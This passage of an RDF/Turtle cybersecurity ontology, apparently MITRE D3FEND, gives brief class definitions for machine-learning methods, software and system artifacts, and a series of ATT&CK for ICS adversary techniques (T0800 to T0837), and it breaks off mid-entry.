d3f:d3fend-id "D3A-SVD" ; d3f:definition "Singular Value Decomposition (SVD) is an algorithm that represents a matrix as a linear series of data and to find the set of factors that will best predict an outcome" ; d3f:kb-article """## References Wikipedia. (n.d.). Singular value decomposition. [Link](https://en.wikipedia.org/wiki/Singular_value_decomposition)""" ; rdfs:subClassOf d3f:DimensionReduction . d3f:SoftwareArtifactServer a owl:Class ; rdfs:label "Software Artifact Server" ; d3f:definition "A software artifact server provides access to the software artifacts in a software repository. A software repository, or \"repo\" for short, is a storage location for software packages. Often a table of contents is stored, as well as metadata. Repositories group packages. Sometimes the grouping is for a programming language, such as CPAN for the Perl programming language, sometimes for an entire operating system, sometimes the license of the contents is the criteria. At client side, a package manager helps installing from and updating the repositories." ; rdfs:seeAlso , ; rdfs:subClassOf d3f:ArtifactServer . d3f:SoftwarePatch a owl:Class ; rdfs:label "Software Patch" ; d3f:definition "A patch is a piece of software designed to update a computer program or its supporting data, to fix or improve it. This includes fixing security vulnerabilities and other bugs, with such patches usually called bugfixes or bug fixes, and improving the usability or performance. Although meant to fix problems, poorly designed patches can sometimes introduce new problems (see software regressions). In some special cases updates may knowingly break the functionality, for instance, by removing components for which the update provider is no longer licensed or disabling a device." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Software ; skos:altLabel "Patch" . d3f:SoftwareRepository a owl:Class, owl:NamedIndividual ; rdfs:label "Software Repository" ; d3f:contains d3f:SoftwarePackage ; d3f:definition "A software repository, or repo for short, is a storage location for software packages. Often a table of contents is also stored, along with metadata. A software repository is typically managed by source or version control, or repository managers. Package managers allow automatically installing and updating repositories, sometimes called 'packages'." ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:SoftwarePackage ], d3f:Repository ; skos:altLabel "Package Repository" . d3f:SomersD a owl:Class, owl:NamedIndividual ; rdfs:label "Somers' D" ; d3f:d3fend-id "D3A-SD" ; rdfs:subClassOf d3f:RankCorrelationCoefficient . d3f:SoundexMatching a owl:Class, owl:NamedIndividual ; rdfs:label "Soundex Matching" ; d3f:d3fend-id "D3A-SM" ; d3f:definition "Soundex is a phonetic algorithm for indexing names by sound, as pronounced in English." ; d3f:kb-article """## How it works The goal is for homophones to be encoded to the same representation so that they can be matched despite minor differences in spelling. The algorithm mainly encodes consonants; a vowel will not be encoded unless it is the first letter. Soundex is the most widely known of all phonetic algorithms (in part because it is a standard feature of popular database software. Improvements to Soundex are the basis for many modern phonetic algorithms. ## References 1. Soundex. (2023, April 19). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Soundex)""" ; rdfs:subClassOf d3f:PartialMatching . d3f:SourceCodeAnalyzerTool a owl:Class ; rdfs:label "Source Code Analyzer Tool" ; d3f:definition "A source code analyzer tool is a static analysis tool that operates specifically on source code, but not object code." ; rdfs:seeAlso ; rdfs:subClassOf d3f:StaticAnalysisTool . d3f:SpearmansRankCorrelationCoefficient a owl:Class, owl:NamedIndividual ; rdfs:label "Spearman's Rank Correlation Coefficient" ; d3f:d3fend-id "D3A-SRCC" ; d3f:synonym "Spearman's Rho" ; rdfs:subClassOf d3f:RankCorrelationCoefficient . d3f:SpectralClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Spectral Clustering" ; d3f:d3fend-id "D3A-SC" ; d3f:definition "Spectral clustering is a technique that identifies communities of nodes in a graph based on the edges connecting them." ; d3f:kb-article """## References Towards Data Science. (n.d.). Spectral Clustering. [Link](https://towardsdatascience.com/spectral-clustering-aba2640c0d5b)""" ; rdfs:subClassOf d3f:Graph-basedClustering . d3f:StackSegment a owl:Class, owl:NamedIndividual ; rdfs:label "Stack Segment" ; d3f:contains d3f:StackFrame ; d3f:definition "The stack segment contains the program stack, a last-in-first-out structure, typically allocated in the higher parts of memory for the process." ; rdfs:seeAlso , ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:StackFrame ], d3f:ProcessSegment . d3f:Stacking a owl:Class, owl:NamedIndividual ; rdfs:label "Stacking" ; d3f:d3fend-id "D3A-STA" ; d3f:definition "Stacking is a method of using the results and predictions from one layer of ML models as inputs to another layer of ML models. Stacking (sometimes called stacked generalization) involves training a model to combine the predictions of several other learning algorithms." ; d3f:kb-article """## References Ensemble learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Ensemble_learning).""" ; rdfs:subClassOf d3f:EnsembleLearning . d3f:StartupDirectory a owl:Class ; rdfs:label "Startup Directory" ; d3f:definition "A startup directory is a directory containing executable files or links to executable files which are run when a user logs in or when a system component or service is started." ; rdfs:subClassOf d3f:Directory, d3f:LocalResource . d3f:StorageDeviceEvent a owl:Class ; rdfs:label "Storage Device Event" ; d3f:definition "An event describing the activity, configuration, or errors of storage devices, including physical disks, SSDs, or logical partitions. These events often pertain to data availability, integrity, and storage health." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:SecondaryStorage ], d3f:HardwareDeviceEvent . d3f:StringEquivalenceMatching a owl:Class, owl:NamedIndividual ; rdfs:label "String Equivalence Matching" ; d3f:d3fend-id "D3A-SEM" ; d3f:definition "String equivalence matching is a type of string pattern matching which is exact; that is, the strings being compared must have the same value for each character in their sequence and be of the same length." ; d3f:kb-article """## References 1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm) 2. Types of Equality. (2007, March 2). In _WikiWikiWeb_. [Link](https://wiki.c2.com/?TypesOfEquality)""" ; rdfs:subClassOf d3f:EquivalenceMatching, d3f:StringPatternMatching . d3f:StringFormatFunction a owl:Class ; rdfs:label "String Format Function" ; d3f:definition "A function which creates a new string based on a format specification and correspondingi specified values." ; rdfs:subClassOf d3f:Subroutine . d3f:StyleGAN a owl:Class, owl:NamedIndividual ; rdfs:label "StyleGAN" ; d3f:d3fend-id "D3A-STY" ; d3f:definition "Successor to the ProGAN." ; d3f:kb-article """## References Wikipedia. (n.d.). StyleGAN. [Link](https://en.wikipedia.org/wiki/StyleGAN)""" ; d3f:synonym "Style GAN" ; rdfs:subClassOf d3f:ImageSynthesisGAN . d3f:SubspaceClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Subspace Clustering" ; d3f:d3fend-id "D3A-SC" ; d3f:definition "Subspace clustering is an extension of traditional clustering that seeks to find clusters in different subspaces within a dataset." ; d3f:kb-article """## References Parsons, L., Haque, E., & Liu, H. (2004). Subspace Clustering for High Dimensional Data: A Review. [Link](https://www.kdd.org/exploration_files/parsons.pdf)""" ; rdfs:subClassOf d3f:CorrelationClustering . d3f:SubstringMatching a owl:Class, owl:NamedIndividual ; rdfs:label "Substring Matching" ; d3f:d3fend-id "D3A-SM" ; d3f:definition "String-searching algorithms, sometimes called string-matching algorithms, are an important class of string algorithms that try to find a place where one or several strings (also called patterns) are found within a larger string or text." ; d3f:kb-article """## References 1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)""" ; rdfs:subClassOf d3f:PartialMatching . d3f:SupplyChainAttacker a owl:Class ; rdfs:label "Supply Chain Attacker" ; d3f:definition "An attacker who exploits vulnerabilities in the supply chain to compromise systems or data." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:Software ], d3f:Attacker . d3f:SupportVectorMachineClassification a owl:Class, owl:NamedIndividual ; rdfs:label "Support Vector Machine Classification" ; d3f:d3fend-id "D3A-SVMC" ; d3f:definition "Support Vector Machine (SVM) is a robust classification and regression technique that maximizes the predictive accuracy of a model without overfitting the training data. SVM is particularly suited to analyzing data with very large numbers (for example, thousands) of predictor fields." ; d3f:kb-article """## References About Support Vector Machine (SVM). IBM SPSS Modeler SaaS Documentation. [Link](https://www.ibm.com/docs/en/spss-modeler/saas?topic=models-about-svm&mhsrc=ibmsearch_a&mhq=support%20vector%20machine).""" ; rdfs:subClassOf d3f:Classification . d3f:Switch a owl:Class ; rdfs:label "Switch" ; d3f:definition "A network switch (also called switching hub, bridging hub, and by the IEEE MAC bridge) is networking hardware that connects devices on a computer network by using packet switching to receive and forward data to the destination device. A network switch is a multiport network bridge that uses MAC addresses to forward data at the data link layer (layer 2) of the OSI model. Some switches can also forward data at the network layer (layer 3) by additionally incorporating routing functionality. Such switches are commonly known as layer-3 switches or multilayer switches." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:ComputerNetworkNode ; skos:altLabel "Bridging Hub", "MAC Bridge", "Network Switch", "Switching Hub" . d3f:SymmetricFeature-basedTransferLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Symmetric Feature-based Transfer Learning" ; d3f:d3fend-id "D3A-SFTL" ; d3f:definition "Homogeneous symmetric transformation takes both the source feature space Xs and target feature space Xt and learns feature transformations as to project each onto a common subspace Xc for adaptation purposes. This derived subspace becomes a domain-invariant feature subspace to associate cross-domain data, and in effect, reduces marginal distribution differences." ; d3f:kb-article """## References Day, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. *Journal of Big Data, 4*(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).""" ; rdfs:subClassOf d3f:HomogenousTransferLearning . d3f:SymmetricKey a owl:Class ; rdfs:label "Symmetric Key" ; d3f:definition "A symmetric key is a single key used for both encryption and decryption and used with a symmetric-key algorithm. Symmetric-key algorithms are algorithms for cryptography that use the same cryptographic keys for both encryption of plaintext and decryption of ciphertext. The keys may be identical or there may be a simple transformation to go between the two keys. The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. This requirement that both parties have access to the secret key is one of the main drawbacks of symmetric key encryption, in comparison to public-key encrytption (also known as asymmetric key encryption)." ; rdfs:seeAlso ; rdfs:subClassOf d3f:CryptographicKey . d3f:SystemCallEvent a owl:Class ; rdfs:label "System Call Event" ; d3f:definition "An event where a user-space process requests a service or resource from the operating system kernel through a system call interface, enabling controlled interactions with hardware or kernel-level operations." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:SystemCall ], d3f:KernelEvent . d3f:SystemInitProcess a owl:Class ; rdfs:label "System Init Process" ; d3f:definition "A system initialization process is a process that executes to initialize (boot) an operating system." ; rdfs:seeAlso , , ; rdfs:subClassOf d3f:OperatingSystemProcess ; skos:altLabel "System Initialization Process", "System Startup Process" . d3f:SystemUtilizationRecord a owl:Class ; rdfs:label "System Utilization Record" ; d3f:definition "A system utilization record is a record for the tracking of resource utilization e.g. CPU, Disk, Network, Memory Bandwidth, GPU, or other resources for a given time period." ; rdfs:subClassOf d3f:Record . d3f:T0800 a owl:Class ; rdfs:label "Activate Firmware Update Mode - ATTACK ICS" ; d3f:attack-id "T0800" ; d3f:definition "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Activate Firmware Update Mode" . d3f:T0801 a owl:Class ; rdfs:label "Monitor Process State - ATTACK ICS" ; d3f:attack-id "T0801" ; d3f:definition "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Monitor Process State" . d3f:T0802 a owl:Class ; rdfs:label "Automated Collection - ATTACK ICS" ; d3f:attack-id "T0802" ; d3f:definition "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Automated Collection" . d3f:T0803 a owl:Class ; rdfs:label "Block Command Message - ATTACK ICS" ; d3f:attack-id "T0803" ; d3f:definition "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)" ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Block Command Message" . d3f:T0804 a owl:Class ; rdfs:label "Block Reporting Message - ATTACK ICS" ; d3f:attack-id "T0804" ; d3f:definition "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Block Reporting Message" . d3f:T0805 a owl:Class ; rdfs:label "Block Serial COM - ATTACK ICS" ; d3f:attack-id "T0805" ; d3f:definition "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Block Serial COM" . d3f:T0806 a owl:Class ; rdfs:label "Brute Force I/O - ATTACK ICS" ; d3f:attack-id "T0806" ; d3f:definition "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point." ; rdfs:subClassOf d3f:ATTACKICSImpairProcessControlTechnique ; skos:prefLabel "Brute Force I/O" . d3f:T0807 a owl:Class ; rdfs:label "Command-Line Interface - ATTACK ICS" ; d3f:attack-id "T0807" ; d3f:definition "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "Command-Line Interface" . d3f:T0808 a owl:Class ; rdfs:label "Control Device Identification - ATTACK ICS" ; d3f:attack-id "T0808" ; d3f:definition "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSDiscoveryTechnique ; owl:deprecated true ; skos:prefLabel "Control Device Identification" . d3f:T0809 a owl:Class ; rdfs:label "Data Destruction - ATTACK ICS" ; d3f:attack-id "T0809" ; d3f:definition "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)" ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Data Destruction" . d3f:T0810 a owl:Class ; rdfs:label "Data Historian Compromise - ATTACK ICS" ; d3f:attack-id "T0810" ; d3f:definition "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; owl:deprecated true ; skos:prefLabel "Data Historian Compromise" . d3f:T0811 a owl:Class ; rdfs:label "Data from Information Repositories - ATTACK ICS" ; d3f:attack-id "T0811" ; d3f:definition "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)" ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Data from Information Repositories" . d3f:T0812 a owl:Class ; rdfs:label "Default Credentials - ATTACK ICS" ; d3f:attack-id "T0812" ; d3f:definition "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)" ; rdfs:subClassOf d3f:ATTACKICSLateralMovementTechnique ; skos:prefLabel "Default Credentials" . d3f:T0813 a owl:Class ; rdfs:label "Denial of Control - ATTACK ICS" ; d3f:attack-id "T0813" ; d3f:definition "Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)" ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Denial of Control" . d3f:T0814 a owl:Class ; rdfs:label "Denial of Service - ATTACK ICS" ; d3f:attack-id "T0814" ; d3f:definition "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Denial of Service" . d3f:T0815 a owl:Class ; rdfs:label "Denial of View - ATTACK ICS" ; d3f:attack-id "T0815" ; d3f:definition "Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)" ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Denial of View" . d3f:T0816 a owl:Class ; rdfs:label "Device Restart/Shutdown - ATTACK ICS" ; d3f:attack-id "T0816" ; d3f:definition "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Device Restart/Shutdown" . d3f:T0817 a owl:Class ; rdfs:label "Drive-by Compromise - ATTACK ICS" ; d3f:attack-id "T0817" ; d3f:definition "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Drive-by Compromise" . d3f:T0818 a owl:Class ; rdfs:label "Engineering Workstation Compromise - ATTACK ICS" ; d3f:attack-id "T0818" ; d3f:definition "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; owl:deprecated true ; skos:prefLabel "Engineering Workstation Compromise" . d3f:T0819 a owl:Class ; rdfs:label "Exploit Public-Facing Application - ATTACK ICS" ; d3f:attack-id "T0819" ; d3f:definition "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Exploit Public-Facing Application" . d3f:T0820 a owl:Class ; rdfs:label "Exploitation for Evasion - ATTACK ICS" ; d3f:attack-id "T0820" ; d3f:definition "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features." ; rdfs:subClassOf d3f:ATTACKICSEvasionTechnique ; skos:prefLabel "Exploitation for Evasion" . d3f:T0821 a owl:Class ; rdfs:label "Modify Controller Tasking - ATTACK ICS" ; d3f:attack-id "T0821" ; d3f:definition "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "Modify Controller Tasking" . d3f:T0822 a owl:Class ; rdfs:label "External Remote Services - ATTACK ICS" ; d3f:attack-id "T0822" ; d3f:definition "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)" ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "External Remote Services" . d3f:T0823 a owl:Class ; rdfs:label "Graphical User Interface - ATTACK ICS" ; d3f:attack-id "T0823" ; d3f:definition "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "Graphical User Interface" . d3f:T0824 a owl:Class ; rdfs:label "I/O Module Discovery - ATTACK ICS" ; d3f:attack-id "T0824" ; d3f:definition "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSDiscoveryTechnique ; owl:deprecated true ; skos:prefLabel "I/O Module Discovery" . d3f:T0825 a owl:Class ; rdfs:label "Location Identification - ATTACK ICS" ; d3f:attack-id "T0825" ; d3f:definition "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; owl:deprecated true ; skos:prefLabel "Location Identification" . d3f:T0826 a owl:Class ; rdfs:label "Loss of Availability - ATTACK ICS" ; d3f:attack-id "T0826" ; d3f:definition "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)" ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Loss of Availability" . d3f:T0827 a owl:Class ; rdfs:label "Loss of Control - ATTACK ICS" ; d3f:attack-id "T0827" ; d3f:definition "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)" ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Loss of Control" . d3f:T0828 a owl:Class ; rdfs:label "Loss of Productivity and Revenue - ATTACK ICS" ; d3f:attack-id "T0828" ; d3f:definition "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments." ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Loss of Productivity and Revenue" . d3f:T0829 a owl:Class ; rdfs:label "Loss of View - ATTACK ICS" ; d3f:attack-id "T0829" ; d3f:definition "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)" ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Loss of View" . d3f:T0830 a owl:Class ; rdfs:label "Adversary-in-the-Middle - ATTACK ICS" ; d3f:attack-id "T0830" ; d3f:definition "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)" ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Adversary-in-the-Middle" . d3f:T0831 a owl:Class ; rdfs:label "Manipulation of Control - ATTACK ICS" ; d3f:attack-id "T0831" ; d3f:definition "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection." ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Manipulation of Control" . d3f:T0832 a owl:Class ; rdfs:label "Manipulation of View - ATTACK ICS" ; d3f:attack-id "T0832" ; d3f:definition "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)" ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Manipulation of View" . d3f:T0833 a owl:Class ; rdfs:label "Modify Control Logic - ATTACK ICS" ; d3f:attack-id "T0833" ; d3f:definition "Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSImpairProcessControlTechnique, d3f:ATTACKICSInhibitResponseFunctionTechnique ; owl:deprecated true ; skos:prefLabel "Modify Control Logic" . d3f:T0834 a owl:Class ; rdfs:label "Native API - ATTACK ICS" ; d3f:attack-id "T0834" ; d3f:definition "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "Native API" . d3f:T0835 a owl:Class ; rdfs:label "Manipulate I/O Image - ATTACK ICS" ; d3f:attack-id "T0835" ; d3f:definition "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Manipulate I/O Image" . d3f:T0836 a owl:Class ; rdfs:label "Modify Parameter - ATTACK ICS" ; d3f:attack-id "T0836" ; d3f:definition "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor." ; rdfs:subClassOf d3f:ATTACKICSImpairProcessControlTechnique ; skos:prefLabel "Modify Parameter" . d3f:T0837 a owl:Class ; rdfs:label "Loss of Protection - ATTACK ICS" ; d3f:attack-id "T0837" ; d3f:definition "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process 